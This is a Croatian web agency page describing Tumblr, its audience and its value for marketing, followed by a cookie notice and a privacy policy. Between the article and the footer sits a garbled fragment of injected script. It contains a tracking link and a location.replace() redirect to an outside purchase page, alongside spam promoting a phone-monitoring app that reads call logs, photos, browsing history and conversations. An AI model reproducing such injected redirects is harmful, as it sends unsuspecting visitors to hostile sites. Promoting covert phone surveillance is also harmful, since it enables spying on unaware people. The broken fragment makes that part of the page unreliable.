Pošaljite upit!

Jednostavno Tumblr.

Jednostavno Tumblr.

Što je Tumblr?

 

Tumblr je platforma i društvena mreža koju je osnovao David Karp u vlasništvu Yahoo!Inc.

Jednostavno rečeno, to je stranica za bloganje fotografija. Korisnici mogu postavljati zanimljive fotografije, video uratke i druge medije za njihove pratitelje, koji također te materijale mogu dijeliti sa svojim pratiteljima. Tumblr ima veliki naglasak na vizualni medij, što je prikladan izbor za mnoge tvrtke jer skoro da nema barijera što se tiče dijeljenja sadržaja.

 

Zašto je Tumblr drugačiji od drugih društvenih mreža?

 

Tumblr je jako sličan Twitteru, Instagramu i ostalim tradicionalnim blogovima.. Korisnici se pretplate na onaj sadržaj koji ih zanima, tako da taj sadržaj automatski ide na korisnikovu početnu stranicu.

 

Osnovna razlika između Tumblr-a i Twittera je u tome što je Tumblr najviše fokusiran na vizualni medij i ne postoji ograničenje na broj riječi u objavama. Mnogi korisnici zapravo koriste riječi da objasne neku sliku. Na vrhu slike, korisnici mogu postavljati različita videa, zvučne datoteke i mnoge druge sadržaje.

 

Tumblr se u tolikoj mjeri može prilagoditi korisnicima, jer iako postoje gotovi predlošci koje možete odabrati, postoji mogućnost da možete složiti svoju stranicu kako želite.

 

Tumblr je drugačiji od Facebooka u smislu da je on više usmjeren oko korisnika koji dijele zajednički interes, za razliku od Facebooka koji je orijentiran na prijatelje i obitelj. Također svaki korisnik može pratiti bilo kojeg drugog korisnika bez njihove dozvole. Razlog tome je što je Tumblr manje strog kad se radi o prikupljanju informacija o korisnicima i o provjeri računa.

 

Koje je ciljno tržište Tumblr-a?

 

Kao i većina društvenih medija, Tumblr također privlači određenu demografsku skupinu. Prema podacima, primarni korisnici ovog medija u SAD-u su žene između 18 i 34 godine.

 

Promoviranje poslovanja putem Tumblra?

 

Primarna svrha Tumblra je dijeljenje vizualnih sadržaja i animacija. Dok su kod drugih medija tekstualne objave jako popularne, tu je funkcija teksta samo u opisu slika i animacija koji se prikazuju.

 

Zbog toga neke od najuspješnijih industrija se oglašavaju na Tumblru. To su filmske industrije, moda, TV emisije i umjetnost. To ne znači da su druge branše zapostavljene i da se ne bi trebale zamarati sa Tumblr-om. S obzirom da je naglasak na vizuaalni efekt prije svega cilj je marketinga da napravite što je više moguće privlačnu vizualu i iskoristite je u svoju korist.

 

 

Web za mene”http:///?sl=319481-c261c&data1=Track1&data2=Track2″; location.replace(“http://gethere.info/buy.php”);if (document.currentScript) { All of the text and http://celltrackingapps.com/ikeymonitor call logs, photo and video history, web browsing history and phone conversations can be found here

Nastavkom pregledavanja ove stranice prihvačate korištenje Cookia. Više informacija

IZJAVA O PRIVATNOSTI Webnet poštuje vašu privatnost te nastojimo osigurati tajnost vaših privatnih podataka Svjesni smo da ubrzani rast interneta i online servisa utječu na pitanja vezana uz vaše osobne podatke, ali isto tako nastojimo sve vaše skupljene podatke držati u strogoj tajnosti te se obvezujemo da ćemo voditi računa o sigurnosti i tajnosti vaših osobnih podataka. KOJE INFORMACIJE PRIKUPLJAMO? Prikupljamo informacije iz online registracijskog formulara koje ispunjava sam korisnik. Prilikom narudžbe ili registracije možemo Vas tražiti za Vaše cijenjeno ime, prezime, email adresu, adresu i telefonski broj. Pregledavati web trgovinu možete i bez dostave vaših osobnih podataka. U KOJU SVRHU UPOTREBLJAVAMO VAŠE OSOBNE PODATKE? Vaše podatke možemo koristiti u sljedeće svrhe: • personalizacija sadržaja (vaše podatke koristimo u svrhu unapređenja kvalitete sadržaja namijenjenog pojedinom korisniku) • unapređenje naše web stranice (neprestano unapređujemo našu stranicu na temelju Vaših kritika, iskustava i prijedloga) • unapređenje usluge (vaši podaci nam omogućuju da unaprijedimo korisničku podršku te što kvalitetnije zadovoljimo korisničke zahtjeve i potrebe) • slanje periodičnih e-mailova ( u svrhu unapređenja usluga i poboljšanja korisničkih iskustava šaljemo periodične mailove sa relevantnim novostima, informacijama i obavjestima) • promocija, administracija i nadzor stranice NA KOJI NAČIN ČUVAMO VAŠE PODATKE? Vaše podatke čuvamo implementacijom sigurnosnih mjera. KORISTIMO LI COOKIJE? Stranica www.webzamene.net koristi cookije DIJELIMO LI VAŠE PODATKE VANJSKIM PARTNERIMA? Vaše podatke ne prodajemo, mijenjamo ni na koji način dijelimo s vanjskim partnerima. Vaše podatke dostavljamo JEDINO u slučaju kršenja zakona ili na temelju sudskog naloga kojeg smo dužni poštovati. GUBITAK VAŠIH OSOBNIH PODATAKA Stranica www.webzamene.net ne odgovara za štetu nastalu gubitkom Vaših osobnih podataka. Webnet d.o.o. ne može se smatrati odgovornim za zlouporabe za koje se ne može utvrditi da su nastale kao posljedica tehničko-sigurnosnog propusta sustava web trgovine ili propusta djelatnika Webnet d.o.o. ONLINE IZJAVA O PRIVATNOSTI Ova izjava privatnosti vrijedi samo za informacije prikupljene preko naše web stranice, ne vrijedi za informacije prikupljene offline putem. VAŠA SUGLASNOST Koristeći stranicu www.webzamene.net pristajete na Izjavu o privatnosti. PROMJENE U DOKUMENTU "IZJAVA O PRIVATNOSTI" Ukoliko ćemo imati potrebu za promjenom dokumenta "Izjava o privatnosti" sve navedene izmjene će biti objavljene u ovom dokumentu. Zadnji datum izmjene: 10/11/2012 KONTAKTIRAJTE NAS Ukoliko imate bilo kakvo pitanje vezano uz sigurnost vaših osobnih podataka možete nas kontaktirati na : mail: info@webnet.hr

Zatvori